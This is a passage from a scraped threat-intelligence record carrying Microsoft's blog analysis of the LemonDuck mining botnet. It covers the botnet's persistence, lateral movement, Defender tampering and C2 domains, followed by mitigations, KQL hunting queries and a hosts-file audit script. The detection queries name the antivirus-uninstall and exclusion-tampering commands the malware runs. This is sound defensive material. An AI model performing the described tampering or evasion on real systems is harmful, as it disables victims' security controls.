Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mmpc", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MMPC:E537BA51663A720821A67D2A4F7F7F0E", 
"href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. 
After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. 
They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. 
To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. 
These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. 
The attackers can also change the threat’s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety of names such as the following:

 * ackng[.]com
 * bb3u9[.]com
 * ttr3p[.]com
 * zz3r0[.]com
 * sqlnetcat[.]com
 * netcatkit[.]com
 * hwqloan[.]com
 * 75[.]ag
 * js88[.]ag
 * qq8[.]ag

In addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated, non-real domain name. This information is then added to the Windows hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update the entry once every 24 hours.

LemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:

 * _IF.BIN_ (used for lateral movement and privilege escalation)
 * _KR.BIN_ (used for competition removal and host patching)
 * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)

Executables used throughout the infection also use random file names sourced from the initiating script, which selects random characters.

## Lateral movement and privilege escalation

_IF.Bin_, whose name stands for “Infection”, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance.
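The hosts-file technique above leaves a host-based artifact that can be audited independently of EDR telemetry. The following is an added example, not code from the Microsoft post: it parses a Windows hosts file and flags entries that bind a routable (non-loopback, non-RFC 1918) address to a random-looking hostname, which is the shape of the entries the post describes. The sample hosts content is constructed for the example, and the randomness heuristics (vowel ratio, digit ratio, character entropy and their thresholds) are this example's own assumptions rather than values from the report.

```python
"""Audit a Windows hosts file for LemonDuck-style C2 aliases.

Added example, not code from the Microsoft post. LemonDuck resolves a C2
address and binds it in the hosts file to a randomly generated hostname that
does not exist in DNS, so the later download is addressed to that fake name.
The sample hosts content is constructed; the randomness heuristics and their
thresholds are this example's assumptions, not values from the report.
"""
import ipaddress
import math
import re
from collections import Counter

HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"

# Constructed sample: stock entries, one legitimate internal alias, two planted C2 aliases.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
10.0.0.5        intranet.corp.example   # internal portal
203.0.113.17    qz7kx3vplm2r.xyz
198.51.100.9    t9d2wq
"""

# Bindings to loopback or RFC 1918 space are routine admin use and are ignored.
BENIGN_NETS = [ipaddress.ip_network(n) for n in
               ("127.0.0.0/8", "::1/128", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
HOSTS_LINE = re.compile(r"^\s*(\S+)\s+(.+?)\s*(?:#.*)?$")
VOWELS = set("aeiou")


def parse_hosts(text):
    """Yield (address, hostname) for every binding, skipping comments and blank lines."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = HOSTS_LINE.match(line)
        if not m:
            continue
        addr, names = m.groups()
        for name in names.split():
            yield addr, name.lower()


def entropy(s):
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_random(label):
    """Heuristic for a generated label: long, vowel-poor or digit-heavy, and high-entropy (assumed thresholds)."""
    letters = [c for c in label if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / max(len(letters), 1)
    digit_ratio = sum(c.isdigit() for c in label) / max(len(label), 1)
    return len(label) >= 6 and (vowel_ratio < 0.25 or digit_ratio > 0.3) and entropy(label) > 2.0


def suspicious_entries(text):
    """Return (address, hostname) pairs that bind a routable address to a random-looking name."""
    findings = []
    for addr, name in parse_hosts(text):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue                      # malformed line; not this check's concern
        if any(ip in net for net in BENIGN_NETS):
            continue
        if looks_random(name.split(".")[0]):
            findings.append((addr, name))
    return findings


def audit_hosts_file(path=HOSTS_PATH):
    """Run the check against the live hosts file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())


if __name__ == "__main__":
    for addr, name in suspicious_entries(SAMPLE_HOSTS):
        print(f"suspicious hosts entry: {addr} -> {name}")
```

The six-character minimum keeps short internal acronyms out of the results; any hit is worth pairing with the 24-hour refresh the post mentions, since a PowerShell process rewriting the hosts file on that cadence is a stronger signal than the entry alone.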
It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.

_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren’t already infected. If they aren’t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive’s home directory as hidden files.

Similarly, _IF.Bin_ attempts brute force and exploits vulnerabilities in SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.

Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the “Cat” and “Duck” infrastructures. This tool’s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.

The attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits, against available SSH, MSSQL, SMB, Exchange, RDP, Redis, and Hadoop YARN services on Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying includes 70001 (as published; TCP port numbers only go up to 65535), 8088, 16379, 6379, 22, 445, and 1433.

Other functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The number of contacts found in the mailbox is also sent to the attacker, likely to evaluate the campaign’s effectiveness.

## Competition removal and host patching

At installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via _KR.Bin_, the “Killer” script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence of dozens of competitor malware families via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.

This “Killer” script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called “blackball”, “blutea”, or “rtsa”, which has been in use by all of LemonDuck’s infrastructures for the last year along with other task names.

The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for the Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don’t gain web shell access the way they had. If unmonitored, this scenario could lead to a situation where, because a system no longer appears to be unpatched, suspicious activity that occurred before patching is ignored or thought to be unrelated to the vulnerability.

## Weaponization and continued impact

A miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:

 * _M6.bin_
 * _M6.bin.ori_
 * _M6G.bin_
 * _M6.bin.exe_
 * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN_

Once the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands.

Other affected systems bring in secondary payloads such as Ramnit, a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities that continue long after initial infection demonstrate that even a “simple” infection by coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.

## Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies.
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.

### Mitigations

Apply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.

 * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).
 * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.
 * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.
 * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.
 * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
 * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.
 * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations: Office 365 will honor these settings and can let potentially harmful messages pass through. [Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.

### Attack surface reduction

Turn on the following attack surface reduction rules to block or audit activity associated with this threat:

 * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)
 * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)
 * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)
 * [Block all Office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)
 * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)
 * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)
 * [Block persistence through WMI event subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)
 * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)

### Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

 * TrojanDownloader:PowerShell/LemonDuck!MSR
 * TrojanDownloader:Linux/LemonDuck.G!MSR
 * Trojan:Win32/LemonDuck.A
 * Trojan:PowerShell/LemonDuck.A
 * Trojan:PowerShell/LemonDuck.B
 * Trojan:PowerShell/LemonDuck.C
 * Trojan:PowerShell/LemonDuck.D
 * Trojan:PowerShell/LemonDuck.E
 * Trojan:PowerShell/LemonDuck.F
 * Trojan:PowerShell/LemonDuck.G
 * TrojanDownloader:PowerShell/LodPey.A
 * TrojanDownloader:PowerShell/LodPey.B
 * Trojan:PowerShell/Amynex.A
 * Trojan:Win32/Amynex.A

### Endpoint detection and response (EDR) alerts

Alerts with the following titles in the security center can indicate threat activity on your network:

 * LemonDuck botnet C2 domain activity
 * LemonDuck malware

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

 * Suspicious PowerShell command line
 * Suspicious remote activity
 * Suspicious service registration
 * Suspicious Security Software Discovery
 * Suspicious System Network Configuration Discovery
 * Suspicious sequence of exploration activities
 * Suspicious Process Discovery
 * Suspicious System Owner/User Discovery
 * Suspicious System Network Connections Discovery
 * Suspicious Task Scheduler activity
 * Suspicious Microsoft Defender Antivirus exclusion
 * Suspicious behavior by cmd.exe was observed
 * Suspicious remote PowerShell execution
 * Suspicious behavior by svchost.exe was observed
 * A WMI event filter was bound to a suspicious event consumer
 * Attempt to hide use of dual-purpose tool
 * System executable renamed and launched
 * Microsoft Defender Antivirus protection turned off
 * Anomaly detected in ASEP registry
 * A script with suspicious content was observed
 * An obfuscated command line sequence was identified
 * A process was injected with potentially malicious code
 * A malicious PowerShell Cmdlet was invoked on the machine
 * Suspected credential theft activity
 * Outbound connection to non-standard port
 * Sensitive credential memory read

### Advanced hunting

The LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.

**NOTE:** The following sample queries let you search for a week’s worth of events.
To explore up to 30 days of raw data, inspect events in your network, and locate potential LemonDuck-related indicators older than a week, go to the **Advanced Hunting** page > **Query** tab and use the calendar drop-down menu to set the query time range to **Last 30 days**.

**LemonDuck template subject lines**

Looks for subject lines, used from 2020 to 2021, that the dropped scripts put on emails carrying malicious LemonDuck samples to the contacts of mailboxes on impacted machines. Additionally, checks that attachments are present. Attachment types to check for at present are .DOC, .ZIP or .JS, though these could change, as could the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)

```kusto
EmailEvents
| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS',
'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?')
| where AttachmentCount >= 1
```

**LemonDuck botnet registration functions**

Looks for runs of a function named “SIEX”, which the LemonDuck initializing scripts use to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceEvents
| where ActionType == "PowerShellCommand"
| where AdditionalFields =~ "{\"Command\":\"SIEX\"}"
```

**LemonDuck keyword identification**

Looks for simple usage of LemonDuck keyword variations in commands initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_any("Lemon_Duck","LemonDuck")
```

**LemonDuck Microsoft Defender tampering**

Looks for a command line event where LemonDuck or similar malware attempts to modify Defender by disabling real-time monitoring or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled, due to the design of the application. Custom alerts could be created in an environment for the particular drive letters common in that environment. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess")
| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp
```

**Antivirus uninstallation attempts**

Looks for a command line event where LemonDuck or similar malware uses WMIC to uninstall security products, matching the `product where` / `name like` / `call uninstall` / `/nointeractive` form of the command together with the product names the malware targets. Interactions with security products that are not deployed in the environment are a strong indicator on their own. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wmic.exe"
| where InitiatingProcessCommandLine has_all("product where","name like","call uninstall","/nointeractive")
| where InitiatingProcessCommandLine has_any("Kaspersky","avast","avp","security","eset","AntiVirus","Norton Security")
```

**Known LemonDuck component script installations**

